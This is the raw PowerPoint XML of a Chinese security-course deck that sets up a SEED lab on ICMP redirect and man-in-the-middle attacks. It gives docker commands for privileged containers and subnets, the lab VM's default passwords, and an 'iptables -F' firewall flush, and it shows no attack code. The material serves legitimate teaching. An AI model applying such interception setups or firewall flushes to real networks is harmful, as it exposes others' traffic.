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2"/>
    <p:sldMasterId id="2147483792" r:id="rId3"/>
    <p:sldMasterId id="2147483840" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId19"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId20"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="657" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="660" r:id="rId7"/>
    <p:sldId id="659" r:id="rId8"/>
    <p:sldId id="372" r:id="rId9"/>
    <p:sldId id="658" r:id="rId10"/>
    <p:sldId id="661" r:id="rId11"/>
    <p:sldId id="662" r:id="rId12"/>
    <p:sldId id="585" r:id="rId13"/>
    <p:sldId id="548" r:id="rId14"/>
    <p:sldId id="549" r:id="rId15"/>
    <p:sldId id="649" r:id="rId16"/>
    <p:sldId id="654" r:id="rId17"/>
    <p:sldId id="633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D995E7"/>
    <a:srgbClr val="C1DCF5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3111" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="120" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="-270" y="-453"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2108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2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AA93DD1-9512-4CB9-B469-C1BE09318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0C7FAD-263C-4596-A789-F55B2EB3324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6635D7D-94BC-4BFD-A8B8-DF841763D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65DB43D-4043-466A-9009-695E2AF4D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23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34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2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60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Seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是美国雪城大学教授杜文亮教授课题组花费</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年时间开发和设计的一系列实验，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟机里面包含了所有这些实验需要的环境，里面内置了很多工具、服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218807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容器运行的系统没有图形界面，只有命令行，因此，我们需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的命令行来完成实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269028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2022/4/6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  <a:t>‹#›</a:t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2022/4/6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  <a:t>‹#›</a:t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2022/4/6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2022/4/6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  <a:t>‹#›</a:t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436245"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-394970"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第三级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-387350"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第四级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" indent="-398780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7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8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7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8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7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8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4800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>重定向攻击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4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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692275" y="3357563"/>
            <a:ext cx="575945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FFF12-ABEB-4A33-944E-946626906BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635896" y="378776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王美珍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4658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实验环境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260350" y="1752600"/>
            <a:ext cx="8307705" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1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Ubuntu Seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>虚拟机下载地址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>群空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500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虚拟机软件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> (15.5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>及兼容版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> tools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ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的用户密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="47117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普通用户： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>seed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dees</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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 超级用户：root  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" noProof="1">
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码：</a:t>
            </a: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seedubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9271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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" noProof="1">
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用一个虚拟机，多个容器来完成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" noProof="1"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lang="en-US" altLang="zh-CN" sz="2800" noProof="1"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kumimoji="0" lang="en-US" altLang="zh-CN" sz="28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kumimoji="0" lang="en-US" altLang="zh-CN" sz="26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900" marR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endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="30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62294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52D8-D87E-456A-9E23-8960211F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5AEA1-8EC5-42FA-88BC-E2F08867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4" y="1700808"/>
            <a:ext cx="8101781" cy="5616624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>容器查看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 –a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，可以看到已有一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>容器创建</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>docker run -it --name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> --hostname=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> --privileged “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>seedubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>” /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>容器启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>停止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start/stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>容器名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进入容器的命令行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exec –it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>容器名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>删除容器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>实验未完成前不要删除）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rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>容器名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>虚拟机和容器之间互拷数据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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> docker cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件名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</a:rPr>
              <a:t>容器名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/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err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> docker cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>容器名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/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文件名  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文件名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7381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F36E-CBD3-4491-858A-93BE1D09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D3962-1BA9-4A62-AA5C-9A21812E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001000" cy="5040560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="755650" indent="-285750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上创建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extranet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network create --subnet=10.0.2.0/24 --gateway=10.0.2.8 --opt "com.docker.network.bridge.name"="docker1" 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extranet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上创建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intranet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network create --subnet=192.168.60.0/24 --gateway=192.168.60.1 --opt "com.docker.network.bridge.name"="docker2" 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intranet </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1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Server2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Server2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--hostname=Server2 --net=extranet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=10.0.2.7 --privileged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 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--net=intranet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=192.168.60.2 --privileged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--net=intranet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=192.168.60.3 --privileged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HostC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HostC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HostC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--net=intranet --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=192.168.60.4 --privileged "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840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1FC84-5367-41E0-A551-80895DF8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环境其它配置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5D7D1B-F09F-4F8B-A420-7D62EA443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204864"/>
            <a:ext cx="6243683" cy="202407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E8C7E-CC7F-4B2D-9D27-4C50E8B493EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="1700808"/>
            <a:ext cx="8424936" cy="425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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>容器中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行错误的解决</a:t>
            </a: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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>虚拟机清空防火墙配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRP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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>iptables –F</a:t>
            </a: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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>iptables –L  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看防火墙配置，应该均为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea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8068512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F834-BCE2-4A88-AFFB-7E64D9AF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2D309-3EDC-444A-989C-FF4095AD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按照指导手册进行实验，完成问题，在超星平台提交</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本次实验为选做实验，做完的同学有加分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（网络安全实验部分，加到满分为止）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64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主要内容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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重定向</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向实现中间人攻击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回顾上一次实验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noProof="1" smtClean="0"/>
              <a:pPr lvl="0"/>
              <a:t>3</a:t>
            </a:fld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17BB60-5470-4977-8060-D656841D8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4967" y="1772816"/>
            <a:ext cx="8101781" cy="352839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30A2F7A-EF06-46F2-9A44-ECE28276BEEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7668344" y="2060848"/>
            <a:ext cx="288032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AADD6C-706D-4B69-9CAC-F69BA5ACDB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="4005064"/>
            <a:ext cx="79208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重定向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="605251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5718 L -0.00035 0.05718 C -0.00347 0.05718 -0.0066 0.05741 -0.00955 0.05764 C -0.01615 0.05834 -0.02257 0.05949 -0.02917 0.05996 L -0.0592 0.06227 C -0.06215 0.06274 -0.06649 0.06343 -0.06962 0.06459 C -0.07014 0.06482 -0.07066 0.06551 -0.07135 0.06574 C -0.0717 0.06598 -0.07222 0.06621 -0.07257 0.06644 C -0.07326 0.06713 -0.07378 0.06806 -0.07431 0.06875 C -0.07726 0.07153 -0.07639 0.06899 -0.07917 0.07385 C -0.08594 0.08635 -0.08003 0.07778 -0.08437 0.0838 C -0.0849 0.08542 -0.08542 0.08727 -0.08611 0.08889 C -0.08646 0.08982 -0.0875 0.09028 -0.08785 0.09121 C -0.08854 0.09283 -0.08871 0.09468 -0.08906 0.09653 C -0.08941 0.09792 -0.08976 0.09954 -0.08993 0.10116 C -0.09115 0.10764 -0.09115 0.10811 -0.09219 0.11621 C -0.09236 0.11968 -0.09236 0.12315 -0.09271 0.12662 C -0.09288 0.12963 -0.09392 0.13241 -0.09392 0.13519 C -0.09392 0.15926 -0.09323 0.18311 -0.09271 0.20718 C -0.09253 0.21042 -0.09201 0.21366 -0.09184 0.2169 C -0.09167 0.21875 -0.09045 0.22778 -0.08993 0.22986 C -0.08976 0.23125 -0.08906 0.23287 -0.08871 0.23449 C -0.08715 0.24167 -0.08906 0.2375 -0.08611 0.2426 C -0.08507 0.25093 -0.08646 0.2426 -0.08472 0.24769 C -0.08455 0.24838 -0.08455 0.24931 -0.08437 0.25 C -0.08385 0.25232 -0.08333 0.25463 -0.08264 0.25695 C -0.08194 0.25949 -0.07934 0.26667 -0.07865 0.26806 C -0.07812 0.26922 -0.07743 0.27014 -0.07691 0.27153 C -0.07448 0.27801 -0.07621 0.27686 -0.07257 0.28241 C -0.07135 0.28449 -0.06962 0.28611 -0.06823 0.2882 C -0.06684 0.29051 -0.0658 0.29352 -0.06389 0.29514 C -0.06146 0.29746 -0.0592 0.30047 -0.0566 0.30209 C -0.05174 0.3051 -0.04705 0.30857 -0.04219 0.31088 C -0.03333 0.31528 -0.04115 0.31181 -0.0283 0.31621 C -0.02674 0.31667 -0.02535 0.31736 -0.02396 0.31783 C -0.02118 0.31875 -0.01996 0.31899 -0.01736 0.31968 L -0.00694 0.31852 C -0.00573 0.31829 -0.00434 0.31806 -0.00312 0.31783 C -0.00243 0.31783 -0.00139 0.31736 -0.00139 0.31736 L -0.04792 0.38102 L -0.04913 0.38102 C -0.05226 0.38125 -0.05521 0.38102 -0.05833 0.38149 C -0.06007 0.38195 -0.06163 0.38403 -0.06354 0.3838 C -0.07604 0.3838 -0.08837 0.38195 -0.10087 0.38102 C -0.11163 0.37801 -0.10521 0.38102 -0.11788 0.36713 C -0.12101 0.36366 -0.12465 0.36088 -0.12743 0.35672 C -0.13264 0.34885 -0.13733 0.34005 -0.14306 0.33287 C -0.14531 0.33033 -0.14757 0.32778 -0.14965 0.32477 C -0.15104 0.32269 -0.15208 0.32014 -0.15347 0.31783 C -0.15538 0.31482 -0.15746 0.31204 -0.15955 0.30926 C -0.16163 0.30649 -0.16371 0.3044 -0.16562 0.30162 C -0.16962 0.2963 -0.16788 0.29676 -0.17135 0.29121 C -0.175 0.28519 -0.17569 0.28496 -0.17951 0.2801 C -0.18681 0.2713 -0.1684 0.29306 -0.18437 0.27431 C -0.1849 0.27246 -0.18559 0.27014 -0.18663 0.26852 C -0.18698 0.26806 -0.18906 0.26621 -0.18958 0.26574 C -0.18993 0.26459 -0.19045 0.26343 -0.19045 0.26227 C -0.1908 0.25093 -0.1908 0.23982 -0.19132 0.22871 C -0.19149 0.22709 -0.19184 0.22547 -0.19219 0.22408 C -0.19358 0.21899 -0.19722 0.21436 -0.19965 0.21111 C -0.20469 0.20463 -0.20955 0.20116 -0.21615 0.19723 C -0.21892 0.19561 -0.22187 0.19422 -0.22483 0.19329 C -0.22726 0.1926 -0.22969 0.19283 -0.23229 0.1926 L -0.24479 0.19213 C -0.24896 0.19236 -0.25295 0.19213 -0.25694 0.1926 C -0.25816 0.19283 -0.25937 0.19375 -0.26042 0.19375 C -0.26996 0.19375 -0.27934 0.19306 -0.28871 0.1926 C -0.3125 0.19283 -0.375 0.18959 -0.41146 0.19607 C -0.41806 0.19746 -0.42465 0.19977 -0.43142 0.20139 C -0.43663 0.20255 -0.44184 0.20324 -0.44705 0.20417 L -0.46962 0.2088 L -0.51094 0.21644 C -0.51788 0.2176 -0.52483 0.21899 -0.53177 0.21991 C -0.53837 0.22084 -0.54496 0.22107 -0.55139 0.22176 C -0.57743 0.22361 -0.59531 0.22408 -0.62014 0.22755 C -0.62847 0.22848 -0.63663 0.2301 -0.64496 0.23149 C -0.64653 0.23172 -0.66233 0.23519 -0.66667 0.23565 C -0.66962 0.23565 -0.6724 0.23565 -0.67535 0.23565 L -0.67569 0.23727 L -0.67569 0.23727 L -0.67569 0.23727 " pathEditMode="relative" ptsTypes="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="1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6 -0.02454 L -0.03246 -0.02454 C -0.03333 -0.02708 -0.03437 -0.02917 -0.03507 -0.03171 C -0.03559 -0.03356 -0.03541 -0.03565 -0.03593 -0.0375 L -0.0368 -0.04028 C -0.03698 -0.04143 -0.03698 -0.04259 -0.03715 -0.04375 C -0.03975 -0.05602 -0.03767 -0.04398 -0.03889 -0.05185 C -0.03906 -0.05486 -0.03923 -0.05764 -0.03941 -0.06065 C -0.03941 -0.06204 -0.03975 -0.06319 -0.03975 -0.06458 C -0.03993 -0.0662 -0.0401 -0.06782 -0.04027 -0.06921 C -0.04045 -0.07106 -0.04045 -0.07268 -0.04062 -0.07454 C -0.04097 -0.07685 -0.04166 -0.07917 -0.04201 -0.08148 C -0.04253 -0.08495 -0.04288 -0.08842 -0.04323 -0.0919 C -0.04357 -0.09352 -0.04357 -0.09537 -0.04375 -0.09722 C -0.04392 -0.09884 -0.04444 -0.10046 -0.04461 -0.10231 C -0.04514 -0.10602 -0.04531 -0.10972 -0.04583 -0.11342 C -0.046 -0.11458 -0.04652 -0.11551 -0.0467 -0.1169 C -0.04722 -0.11991 -0.04757 -0.12292 -0.04809 -0.12616 C -0.04913 -0.14467 -0.04774 -0.12361 -0.04982 -0.14236 C -0.05017 -0.14467 -0.05 -0.14699 -0.05017 -0.1493 C -0.05034 -0.15069 -0.05052 -0.15208 -0.05069 -0.15324 C -0.05086 -0.15555 -0.05104 -0.15764 -0.05104 -0.15972 C -0.05017 -0.1743 -0.04982 -0.18866 -0.04843 -0.20324 C -0.04843 -0.2044 -0.04739 -0.20509 -0.0467 -0.20602 C -0.04409 -0.21088 -0.04444 -0.21273 -0.03854 -0.21528 C -0.0309 -0.21875 -0.03836 -0.21504 -0.0302 -0.2206 C -0.02604 -0.22338 -0.02031 -0.22731 -0.01545 -0.22917 C -0.01423 -0.22986 -0.01284 -0.23009 -0.01163 -0.23032 C -0.00538 -0.23449 -0.01024 -0.23217 -0.00069 -0.23333 C 0.00174 -0.23356 0.00764 -0.23495 0.01025 -0.23565 C 0.01129 -0.23588 0.0125 -0.23657 0.01372 -0.2368 C 0.01736 -0.23727 0.02118 -0.23727 0.025 -0.23727 C 0.02622 -0.2375 0.02761 -0.23773 0.02882 -0.23796 C 0.02952 -0.23819 0.03004 -0.23842 0.03056 -0.23842 C 0.03108 -0.23866 0.03143 -0.23912 0.03195 -0.23912 C 0.03698 -0.23935 0.04202 -0.23912 0.04705 -0.23912 L 0.04983 -0.23958 L 0.04983 -0.23958 L 0.04983 -0.23958 L 0.04983 -0.23958 L 0.04983 -0.23958 L 0.04983 -0.23958 L 0.04983 -0.23958 L 0.04844 -0.23796 " pathEditMode="relative" ptsTypes="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F6EC-D3D1-4DAF-9B5F-5E9D799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重定向报文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C837F0-3429-414C-A36E-05A7998C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6" y="1842043"/>
            <a:ext cx="8752047" cy="40380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D3566E9-A7B7-41EB-9B42-B07CC407DFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="3933056"/>
            <a:ext cx="489654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615B1-CB69-4A8E-B35A-1209D704EAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139952" y="5013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原始报文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826BCF-7D68-4722-A354-2B4A32FB1B30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258374" y="2821331"/>
            <a:ext cx="21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当前网关发出的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891FF3-807E-4298-A596-3B18D0545F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
